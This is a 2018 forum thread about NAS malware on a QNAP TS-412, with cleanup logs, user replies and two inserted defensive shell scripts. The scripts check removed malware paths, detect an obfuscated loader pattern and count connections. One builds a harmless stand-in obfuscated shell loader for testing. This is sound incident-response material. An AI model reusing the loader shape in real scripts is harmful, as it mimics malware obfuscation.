05:10:56	[MalwareRemover] The following malicious schedule was found and removed from the crontab: /mnt/HDA_ROOT/.config/cups/XwDkvAdFejW
05:12:06	[App Center] toSbeJjHVJd removed.
05:35:03	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/sys/ajaxRequest.cgi
05:35:06	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/iscsitargetsetting.cgi
05:35:10	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/disk/iscsitargetsetting.cgi
05:35:13	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/qid/share.cgi
05:35:19	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/QTSshare.cgi
05:35:22	[MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//iscsi_lun_usage.cgi
05:37:36	[MalwareRemover] Malware was detected and removed. You must restart the NAS.
05:57:12	[Antivirus] Virus definitions updated.
08:28:57	[Power Management] System restarting.
08:32:24	System was shut down on Thu Oct  4 08:32:24 BST 2018.
08:38:13	System started.
08:44:31	[myQNAPcloud] DDNS updated WAN IP address to [51.148.132.249]
08:45:15	[MalwareRemover] Started scanning.
08:48:03	[App Center] Installed Media Streaming Add-on 430.1.7.1 in /share/MD0_DATA/.qpkg/QDMS.
08:48:29	[App Center] Enabled Media Streaming Add-on.
09:02:40	[MalwareRemover] Scan completed.
10:29:04	[App Center] Java removed.
10:29:42	[App Center] QcloudSSLCertificate 2.1.14 has been installed in /mnt/ext/opt/QcloudSSLCertificate successfully.
10:29:55	[App Center] QcloudSSLCertificate enabled.
I've changed my admin password (it was a strong password so I don't think this was the vector used to inject the malware, but I've done it anyway).
Malware Remover is set to scan daily at 5am.
Do you think I'm safe to reopen the port forwarding on my router to allow https://*****.myqnapcloud.com to work again?

Thanks
Chris
QNAP TS-412 (4 x 2TB WD RED)
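The Malware Remover log above is the only record of what was removed, repaired or pulled out of crontab, and the question that follows (is it safe to reopen the port?) depends on none of it coming back. Here is an added example, not code from the post or from QNAP, that turns those syslog lines into an indicator list and re-checks each one on the NAS after the reboot. The sample log lines are constructed from the excerpt above (tabs replaced by spaces); the crontab location /etc/config/crontab is assumed for QTS on the TS-412 and can be overridden with CRONTAB_FILE.

```shell
#!/bin/sh
# Added example, not from the post or from QNAP: turn Malware Remover syslog lines into an
# indicator list and re-check each one after the reboot, so the cleanup is verified rather
# than trusted.

# Constructed sample (tabs from the NAS log replaced by spaces), same wording as the post.
SAMPLE_LOG='05:09:03 [MalwareRemover] The following malicious file/folder was found and removed: /tmp/.remover_3X8XQ0
05:09:43 [MalwareRemover] The following infected file/folder was found and recovered: /share/MD0_DATA/.kAImccZNHGwkec/.Tpfdvrj.sh
05:10:49 [MalwareRemover] The following malicious schedule was found and removed from the crontab: /share/MD0_DATA/.kAImccZNHGwkec/.Tpfdvrj.sh
05:35:03 [MalwareRemover] The following malicious file/folder was found and removed: /home/httpd//cgi-bin/sys/ajaxRequest.cgi
05:57:12 [Antivirus] Virus definitions updated.'

# stdin: syslog lines. stdout: "<kind> <path>" with kind removed | repaired | crontab.
# The path is whatever follows the last ": " on the line; other log sources are skipped.
extract_iocs() {
  awk '/\[MalwareRemover\]/ {
    kind = ""
    if ($0 ~ /removed from the crontab/) kind = "crontab"
    else if ($0 ~ /found and removed/)   kind = "removed"
    else if ($0 ~ /found and recovered/) kind = "repaired"
    if (kind != "") { n = split($0, p, ": "); print kind, p[n] }
  }'
}

# stdin: extract_iocs output. Re-checks on the local host and returns 1 if anything is
# still present: a removed file that exists again, a repaired script that still carries
# the here-document loader shape, or a crontab line naming the path. CRONTAB_FILE defaults
# to /etc/config/crontab (assumed location of root's crontab on QTS; override if different).
recheck_iocs() {
  crontab_file="${CRONTAB_FILE:-/etc/config/crontab}"
  bad=0
  while read -r kind path; do
    case "$kind" in
      crontab)
        if [ -f "$crontab_file" ] && grep -qF -- "$path" "$crontab_file"
        then echo "STILL SCHEDULED   $path"; bad=1
        else echo "clear (crontab)   $path"; fi ;;
      repaired)
        if [ -f "$path" ] && grep -q '<<"[A-Za-z0-9_]*"|' "$path"
        then echo "STILL OBFUSCATED  $path"; bad=1
        else echo "clean (repaired)  $path"; fi ;;
      *)
        if [ -e "$path" ]
        then echo "PRESENT (removed) $path"; bad=1
        else echo "absent (removed)  $path"; fi ;;
    esac
  done
  return "$bad"
}
```

On the NAS, save the exported log lines to a file and run extract_iocs < log.txt | recheck_iocs over SSH; a non-zero exit means something the remover reported is back. The double slashes in paths such as /home/httpd//cgi-bin/... are kept as logged, since the kernel resolves them to the same file.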
Don
Guru
Posts: 12289
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by Don »

Is that the only port you had forwarded?
Toxic17
Ask me anything
Posts: 6481
Joined: Tue Jan 25, 2011 11:41 pm
Location: Planet Earth

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by Toxic17 »

Personally I would not rely on the malware remover completing its task 100%. I'd reinitialise the NAS and restore from backup to be 100% sure the NAS is not infected - but then again, that's me...
Regards Simon

Qnap Downloads
MyQNap.Org Repository
Submit a ticket • QNAP Helpdesk
QNAP Tutorials, User Manuals, FAQs, Downloads, Wiki
NAS: TS-673A QuTS hero h5.1.2.2534 • TS-121 4.3.3.2420 • APC Back-UPS ES 700G
Network: VM Hub3: 500/50 • UniFi UDM Pro: 3.2.9 • UniFi Network Controller: 8.0.28
USW-Aggregation: 6.6.61 • US-16-150W: 6.6.61 • 2x USW Mini Flex 2.0.0 • UniFi AC Pro 6.6.62 • UniFi U6-LR 6.6.62
UniFi Protect: 2.11.21/8TB Skyhawk AI • 3x G3 Instants: 4.69.55 • UniFi G3 Flex: 4.69.55 • UniFi G5 Flex: 4.69.55
pawelson
New here
Posts: 5
Joined: Fri Sep 21, 2018 8:50 pm

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by pawelson »

You are not safe yet.

Enter /share/CACHEDEV1_DATA/.qpkg (cd /share/CACHEDEV1_DATA/.qpkg)

and then run ls -l.

You will have folders with apps, and a huge number of them will have the same modification date, set by the malware. Mine was infected on 25.08.2018 at 9 am. Inside each folder you will have an sh file with the encrypted malware payload. The devs are working on a new version of Malware Remover. Go to support and open a ticket, so they can see how many people have this problem.

Your machine was unresponsive because it was scanning and infecting other machines. Mine had over 5000 TCP connections and the router started to have problems handling that many connections.

Right now the only 100% safe solution is to wipe your NAS, REFLASH IT (because the infected autorun.sh is in the DOM, not on your disks) and then reinitialize the machine.

You got infected by a security flaw in Music Station.
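The sweep described in the post above, done mechanically, as an added example (not code from the post or from QNAP): list every package launcher under the .qpkg directory with its modification minute so same-minute rewrites cluster together, flag launchers that carry the here-document-piped-into-a-shell loader shape, and count established TCP connections, which was the other symptom. On a real NAS the root is /share/CACHEDEV1_DATA/.qpkg or /share/MD0_DATA/.qpkg (both appear in this thread); the script builds a constructed tree with harmless stand-in launchers so it runs offline, and uses date -r and /proc/net/tcp, which GNU and BusyBox userlands both provide. The sweep tells you the scope of the rewrite, not that the box is clean; the reflash advice above still stands.

```shell
#!/bin/sh
# Added example, not from the post or from QNAP: the .qpkg sweep done mechanically.
# Groups package launchers by modification minute, flags the loader shape, and counts
# established TCP connections.

# Constructed tree standing in for /share/CACHEDEV1_DATA/.qpkg: three "packages", two of
# which were rewritten into loaders in the same minute (harmless rot13 stand-in payload).
make_qpkg_tree() {
  root="$1"
  for p in Plex MusicStation Qsync; do mkdir -p "$root/$p"; done
  printf '#!/bin/sh\n/opt/plex/start "$@"\n' > "$root/Plex/Plex.sh"
  for p in MusicStation Qsync; do
    printf 'A=${x}${y}tr; $A "a-z" "n-za-m" <<"MK"|b${q}ash\nrpub chjarq\nMK\n' > "$root/$p/$p.sh"
  done
  touch -t 201808250900 "$root/MusicStation/MusicStation.sh" "$root/Qsync/Qsync.sh"
  touch -t 201801101200 "$root/Plex/Plex.sh"
}

# One line per launcher: "YYYY-MM-DD HH:MM <tab> path <tab> LOADER|ok", sorted by time,
# so a batch of packages rewritten together shows up as one block.
sweep_launchers() {
  for f in "$1"/*/*.sh; do
    [ -f "$f" ] || continue
    m=$(date -r "$f" '+%Y-%m-%d %H:%M')
    if grep -q '<<"[A-Za-z0-9_]*"|' "$f"; then flag=LOADER; else flag=ok; fi
    printf '%s\t%s\t%s\n' "$m" "$f" "$flag"
  done | sort
}

# Flagged launchers per minute: one large cluster is the "same modification date" sign.
loader_clusters() {
  sweep_launchers "$1" \
    | awk -F'\t' '$3=="LOADER"{n[$1]++} END{for (k in n) printf "%s\t%d\n", k, n[k]}' \
    | sort
}

# Established TCP connections straight from /proc (state field 01 = ESTABLISHED), the
# same source BusyBox netstat reads; thousands on an idle NAS match the scanning symptom.
established_tcp_count() {
  cat /proc/net/tcp /proc/net/tcp6 2>/dev/null | awk '$4=="01"{n++} END{print n+0}'
}
```

Run sweep_launchers /share/CACHEDEV1_DATA/.qpkg over SSH and look for a block of LOADER lines sharing one minute; loader_clusters gives the count per minute, and established_tcp_count run a few times shows whether the box is still busy talking outward.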
UltimateAtrophy
New here
Posts: 3
Joined: Thu Jan 12, 2017 11:44 pm

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by UltimateAtrophy »

When you

Enter /share/CACHEDEV1_DATA/.qpkg

and then run ls -l.

Is this from a terminal on the NAS? I probably got infected, but want to check and verify.
Don
Guru
Posts: 12289
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by Don »

Yes, from an SSH session.
Vmanjeff
New here
Posts: 3
Joined: Thu Dec 08, 2016 5:12 pm

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by Vmanjeff »

Not trying to highjack but have a similar thing happening here. Malware Remover has suddenly sent me about 60 emails saying this file and that were removed. Some of the emails say the file was repaired. Here are several...

NAS Name: Triton-II
Severity: Warning
Date/Time: 2018/11/08 13:40:14

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.qpkg/TMDbTV/TMDbTV.sh.

NAS Name: Triton-II
Severity: Warning
Date/Time: 2018/11/08 13:39:33

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.qpkg/FileStation_HD/FileStation_HD.sh.


NAS Name: Triton-II
Severity: Warning
Date/Time: 2018/11/08 13:38:38

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Repaired infected file or folder. Name: /mnt/HDA_ROOT/update_pkg/helpdesk/www/System/Foundation/SupportUtilsModel.sh

This happened right around the time I updated some installed apps, and I initially thought it might be just a quirk and the NAS was telling me about files it deleted during the update process (even though I never had those types of indications before). Then I looked at some of the emails and came here to check on this.
Additionally, I had a random shutdown the other night which prompted me to do a filesystem check, but the check stalls at 1.5% complete.
Does this seem like the same issue the OP is having?